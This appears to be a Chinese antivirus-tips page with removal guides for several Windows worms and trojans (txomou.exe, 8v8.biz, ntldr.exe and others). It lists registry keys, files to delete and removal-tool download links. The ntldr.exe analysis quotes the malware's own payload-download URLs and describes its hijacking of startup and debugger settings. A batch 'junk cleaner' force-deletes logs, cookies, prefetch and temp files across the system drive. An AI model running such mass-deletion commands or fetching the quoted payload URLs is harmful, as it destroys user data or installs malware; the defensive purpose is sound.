　　1）使用进程管理功能，杀掉ADOBEA.EXE进程

　　2）到注册表中的
　　//HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//run
　　项中删除键值：AdobeA　　　　　　　%admin%
　　\fonts\adobes.exe

　　3）清除FONTS目录下的所有蠕虫生成的文件

　　4）重新启动机器
　　相关的杀毒软件升级到最新的病毒库均能查杀次病毒

admin

txomou.exe病毒清除办法及txomou.exe专杀工具下载
txomou.exe病毒txomou.exe木马中毒特征：

1、系统时间同样被改成2000年，日期，时间不变；
2、病毒被激发10分钟后，360安全卫士，瑞星等软件打开后直接自动关闭；
3、打开网页一定时间内关闭（有时候直接关闭，有时候输入搜索内容就被关闭）；
4、该病毒夹带了另一个病毒0svth.exe（前面数字有好几个）；
5、同样c：\windows\system32下有Autorun.inf这个文件；
6、最厉害的一招，更改所有HTML或者HTM文件，最后面夹带有该病毒的网页只要打开网页，即使杀完毒，该病毒同样被激发；

txomou.exe病毒txomou.exe木马清除方法详解：

　　第一步，把年份改回来。
　　第二步，打开“我的电脑”的“文件夹选项”的“查看”选项卡，把“显示系统文件夹的内容”前打上√，把“隐藏受保护的操作系统文件（推荐）”前的√去掉，点上“显示所有文件和文件夹”，“隐藏已知文件类型的扩展名”前的√去掉，然后“应用”，“确定”。再进一遍“查看”选项卡，看看“显示所有文件和文件夹”选上了没有。如果选上了那还好，如果那个点还是在“不显示隐藏的文件和文件夹”上面的话，那么就需要修改注册表了。
　　第三步，打开注册表（开始—→运行—→regedit），依次展开至：HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL分支，观察右边的窗口中的CheckedValue键值项，看其小图案是不是紫褐色的“ab”。如果是的话，那就需要作如下操作：
　　按右键，选“重命名”，把这个键值名复制下来后，把这个键值名字改掉，如后面加个1；然后在空白处点右键，然后“新建”—→“DWORD值”，然后把这个新建的DWORD值重命名为“CheckedValue”，再把其值改为1，把刚才那个“CheckedValue1”删掉。

现在再重新打开“文件夹选项”的“查看”选项卡，就可以把“显示所有文件和文件夹”选上了。
　　第四步，打开我的电脑，进入硬盘分区，右键选择“排列图标”中的“修改时间”，即选按“修改时间”的顺序排列文件，并在“文件夹选项”中的“查看”选择“应用到所有文件夹”。
　　第五步，打开每个分区的根目录，如C:/、D:/、E:/等，找到隐藏文件sos.exe和另一个貌似以auto开头的隐藏文件，分别删除。删除时，最好能先用unlocker解除锁定，因为我发现如果不先解锁的话，有可能貌似被删除了但却删除不干净——unlocker是一个不错的常备小工具，可以把一些正在运行中的文件给解锁。
　　第六步，打开主系统和备用系统的WINDOWS\system32文件夹，仔细察看文件修改的时间，把中毒那个时候生成可疑文件辨别清楚后，给咔嚓掉。其中一个就是那个TxoMoU.Exe，如果文件是按时间顺序排列的话，那几个病毒文件就在它的前后。
　　第七步，在同样的WINDOWS\system32文件夹，再寻找2000年同一天同一个时间生成其他几个可疑文件，仔细辨别并确认后，一并清除。如中毒时间是2007年11月22日17时47分的话，那么就寻找2000年11月22日17时47分左右生成的文件。
　　第八步，进入主系统和备用系统的WINDOWS\system32\drivers的文件夹，看看最新生成的文件是什么时候生成的。如果有中毒当天生成的，咔嚓掉。
　　第九步，打开主系统和备用系统的WINDOWS文件夹，具体操作与第七步相同。顺便把该文件夹下的Temp文件夹里的内容清空掉。
　　第十步，打开主系统和备用系统的Program Files\Internet Explorer\PLUGINS文件夹，看看有没最近生成的文件，有的话咔嚓掉。
　　第十一步，打开注册表，选“编辑”—→“查找”，分别用“sos.exe”和“TxoMoU”搜索，只要搜到的全给咔嚓掉。
　　第十二步，按下ctrl＋alt＋del，看看任务管理器是否能打开，如果提示被禁用，则打开注册表，依次展开至：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System，找到DisableTaskmgr键值项，把dword值设置为0。
　　第十三步，打开收藏夹，看看有没有木马留下的网页链接，如有则删除。
　　第十四步，准备删除U盘里的木马。如果用的是卡巴斯基，貌似插上后就会有提示是否允许运行，这时当然要选择否，并删除U盘里的病毒文件。
　　第十五步，如果不是卡巴斯基，那么保险起见，建议操作如下：先接上网线，上网，找一个叫“禁止运行指定文件”的小工具（压缩包约有0.97M），确认后下载，解压运行后，把“sos.exe”和“TxoMoU.exe”分别添加入禁止运行的文件名中，“免疫”，重启电脑。
　　第十六步，重启电脑后，打开“我的电脑”，插入U盘，系统读取U盘后，直接双击U盘盘符，或者用右键菜单中的“打开”，是打不开U盘的。这时，右键单击桌面上的“我的电脑”图标，选“资源管理器”，从左边的“文件夹”中打开U盘，删除病毒文件。
　　然后重启电脑，病毒基本清除完毕。最好用优化软件优化一下电脑，把垃圾文件再删除掉。

另外，建议再全盘杀一下毒，有时建立的还原点什么的还会有些残留的东西。
还有，进入“系统配置实用程序”中的“启动”项目，看看还有没有什么残留的项目，方法是“开始”—→“运行”，输入“msconfig”，打开后点最右边的“启动”选项卡，然后对其中的项目仔细加以判别，并根据其“命令”和“位置”，分别查找其在文件夹（注意调整至“显示隐藏文件”）和注册表的相应位置，咔嚓掉。

admin

8v8.biz病毒清除办法及8v8.biz专杀工具下载
8v8.biz病毒中毒症状：
   路由器DHCP获取不到ip地址,网速超慢，重新连接路由器后打开所有网站，查看代码，代码中都会加入一段IFRAME代码，直接链接到8V8.BIZ网站去,卡巴提示:恶意程序;但又杀不出东西.
还有局域网的电脑好象中了冲击波或者震荡波,局域网中计算机出现提示然后重新启动,用专杀却杀不出东西,在有卡巴的机器上有提示:攻击:端口139  或445  和局域网中攻击者的ip

8v8.biz病毒清除方法详解：
1，最简单的解决办法是，ie--属性--限制站点；加上两条 http://* .9zz. biz和http://* .8v8. biz; 但是这样解决的话，病毒还是会存在电脑中的；你是局域网的话， 很容易传播的
2，防御的方法是，打开网页监控，安装arp防火墙，在路由里面禁止访问这两个网站；
3，这病毒是直接不是在系统文件中，是在临时文件中；关键要能把临时文件都给删除了；就没问题了；这里我给大家一个好的方法；30秒内清除系统垃圾；运行完后保证系统能够超过原先的运行速度1倍；

在电脑屏幕的左下角按“开始→程序→附件→记事本”，把下面的文字复制进去,点“另存为”，路径选“桌面”，保存类型为“所有文件”，文件名为“清除系统LJ.bat”，就完成了。记住后缀名一定要是.bat，ok！你的垃圾清除器就这样制作成功了！
　　双击它就能很快地清理垃圾文件，大约一分钟不到。
　　
　　@echo off
　　echo 正在清除系统垃圾文件，请稍等......
　　del /f /s /q %systemdrive%\*.tmp
　　del /f /s /q %systemdrive%\*._mp
　　del /f /s /q %systemdrive%\*.log
　　del /f /s /q %systemdrive%\*.gid
　　del /f /s /q %systemdrive%\*.chk
　　del /f /s /q %systemdrive%\*.old
　　del /f /s /q %systemdrive%\recycled\*.*
　　del /f /s /q %windir%\*.bak
　　del /f /s /q %windir%\prefetch\*.*
　　rd /s /q %windir%\temp & md %windir%\temp
　　del /f /q %userprofile%\cookies\*.*
　　del /f /q %userprofile%\recent\*.*
　　del /f /s /q “%userprofile%\Local Settings\Temporary Internet Files\*.*“
　　del /f /s /q “%userprofile%\Local Settings\Temp\*.*“
　　del /f /s /q “%userprofile%\recent\*.*“
　　echo 清除系统LJ完成！
　　echo. & pause
　　
　　以后只要双击运行该文件，当屏幕提示“清除系统LJ完成！就还你一个“苗条”的系统了！！到时候再看看你的电脑，是不是急速如飞呢？
如果你以做好了程序用的也很好不要忘记了回帖哦%%
运行上面的文件要在安全模式下；才能把文件删除干净

8v8.biz病毒专杀8v8.biz专杀工具下载：
http://down.a6i.com/arp.rar

admin

virus.win32.autorun.mg病毒清除办法及专杀工具下载

virus.win32.autorun.mg病毒virus.win32.autorun.mg木马清除办法
1、断开网络连接，然后双击专杀程序运行。
2、请先单击“查杀说明”查看注意事项和使用方法。
3、保存好所有的工作，关闭所有的程序后，单击“查杀病毒”按钮。
4、专杀工具将自动进行分析和查杀，请耐心等候。
5、查杀完毕后，专杀工具会根据需要自动重新启动计算机（如果不需要重启，则不会重新启动计算机）。
6、重启后，再次运行专杀程序，进行查杀。（一般情况下，还会自动重新启动计算机）。
7、当重新启动计算机后，运行专杀工具已经扫描不到病毒的时候，该病毒及其下载的木马程序即被彻底清除。

注意事项
1、杀毒前请一定要断开网络连接，避免重复感染导致清理不干净。
2、请在杀毒前关闭所有的程序。
3、软件查杀注册表的时候，如果您的系统有拦截注册表操作的软件运行，请一定要选择“允许修改”。
4、由于软件会自动重新启动计算机，请保存好所有工作再执行查杀操作！
5、如果是Vista系统，请选择“以管理员身份”运行本程序。

virus.win32.autorun.mg病毒virus.win32.autorun.mg木马专杀工具介绍
auto.exe病毒是最近流行的一种U盘病毒。由于此病毒具有自动更新功能，因此变种速度快；此外，病毒还会下载许多盗号木马，且这些盗号木马也是经常更新，导致杀毒软件经常不报毒，经常无法完全清理干净。

任软工作室自从推出U盘专杀工具——Autorun病毒防御者以来，一直致力于研究U盘病毒的查杀。在近期得到大量用户提交的病毒样本后，经过分析，摸清了此病毒的特性，做出了此专杀工具。

本专杀工具特有智能分析引擎，能够分析出auto.exe病毒的特征码，并对其下载的盗号木马也进行同步分析处理；还通过智能分析引擎提取出病毒特征码，搜索其注册表启动项和服务项。然后专杀工具将采用两次重复扫描，加强对病毒互相保护的处理。最后如果需要，会自动重新启动计算机，达到彻底删除病毒的目的。

软件独特的智能分析引擎能够保证最新的变种也能够被查杀，其下载的病毒木马也会被一并清理。此外，本专杀还会同步清理临时文件夹和IE临时文件夹下面的病毒，并对病毒主体文件和副本文件进行双重免疫，达到彻底清除不复发的效果。本专杀采用VC++编写，查杀速度快，是auto.exe病毒的克星。

virus.win32.autorun.mg病毒virus.win32.autorun.mg木马专杀工具下载：
http://www.rensoft.com.cn/downloads/kill_auto.rar

admin

ntldr.exe病毒清除办法及ntldr.exe专杀工具下载

ntldr.exe病毒ntldr.exe木马中毒症状：
如果你每个盘符下有ntldr.exe文件，system\目录下有soundmno.exe，证明你中了logogo的最新变种病毒。中了ntldr.exe，soundmno.exe病毒，感染exe文件并跳过感染有exe文件中有ani区段的文件被感染文件尾部被加入一个名为.ani的节。在每个磁盘分区根目录下释放ntldr.exe和autorun.inf达到通过移动存储传播的目的。

ntldr.exe病毒ntldr.exe木马分析：
1.病毒运行后，衍生如下副本：
C:\WINDOWS\system\soundmno.exe
在每个磁盘分区根目录下释放ntldr.exe和autorun.inf达到通过移动存储传播的目的

2.创建注册表启动项目
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TBMonEx: "C:\WINDOWS\system\soundmno.exe"
达到开机启动的目的
在HKLM\SOFTWARE下面创建logogo子键，用以记录病毒安装成功的信息。

3.在HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options下面创建映像劫持项目，指向病毒本身。
（与之前病毒变种相同）

4.感染exe文件 并跳过部分exe文件
并跳过感染有exe文件中有ani区段的文件
被感染文件尾部被加入一个名为.ani的节。

5.连接网络下载木马
读取http://*:1433/xin.jpg的下载列表
然后下载http://*:1433/mylm.exe
http://*:1433/mhlm.exe
http://l.6u6.biz/00001.exe~[url]http://l.6u6.biz/00010.exe[/url]
http://*:1433/00011.exe~http://*:1433/00014.exe
到%systemroot%\system下面
并以SYSTEM128.tmp作为下载文件过程中的临时文件

6.病毒同时会获得当前机器名，操作系统版本，MAC地址等信息 并把信息发送给指定地址
ntldr.exe病毒ntldr.exe木马清除办法：

1.打开sreng
sreng下载地址：http://www.3ctime.cn/2007/12/games/sreng.html

启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
{TBMonEx}{C:\WINDOWS\system\soundmno.exe}  []
并删除所有红色的IFEO项目

2.删除如下病毒文件：
C:\Program Files\Internet Explorer\PLUGINS\Sy_Win7k.Jmp
C:\Program Files\Internet Explorer\PLUGINS\Wn_Sys8x.Sys
C:\WINDOWS\system\inudhya.dll
C:\WINDOWS\system\mhlm.exe
C:\WINDOWS\system\mylm.exe
C:\WINDOWS\system\soundma.exe
C:\WINDOWS\system\soundmno.exe
C:\WINDOWS\system32\avwghin.dll
C:\WINDOWS\system32\avwghmn.dll
C:\WINDOWS\system32\avwghst.exe
C:\WINDOWS\system32\avzxjmn.dll
C:\WINDOWS\system32\avzxjst.exe
C:\WINDOWS\system32\hursax.dll
C:\WINDOWS\system32\kvdxjis.exe
C:\WINDOWS\system32\kvdxjma.dll
C:\WINDOWS\system32\kvdxsjis.exe
C:\WINDOWS\system32\kvdxsjma.dll
C:\WINDOWS\system32\raqjfpi.dll
C:\WINDOWS\system32\raqjftl.exe
C:\WINDOWS\system32\rarjepi.dll
C:\WINDOWS\system32\rarjetl.exe
C:\WINDOWS\system32\rsmyifg.dll
C:\WINDOWS\system32\rsmyipm.dll
C:\WINDOWS\system32\rsmyisp.exe
C:\WINDOWS\system32\rsztmpm.dll
C:\WINDOWS\system32\rsztmsp.exe
C:\WINDOWS\system32\WinForm.dll
C:\WINDOWS\system32\wsmseax.exe
C:\WINDOWS\system32\wsmsezx.dll
C:\WINDOWS\WinForm.exE

3.重启计算机后
双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定
点击 菜单栏下方的 文件夹按钮（搜索右边的按钮）
在左边的资源管理器中单击打开每个盘
删除各个盘根目录下的ntldr.exe和autorun.inf

4.打开sreng
删除上述对应的启动项目 浏览器加载项目

5.使用杀毒软件全盘杀毒以修复被感染的exe文件

ntldr.exe病毒ntldr.exe木马ntldr.exe专杀ntldr.exe专杀工具下载地址：
http://www.cniter.com/upload/autorunkill/AutoGuarder2.rar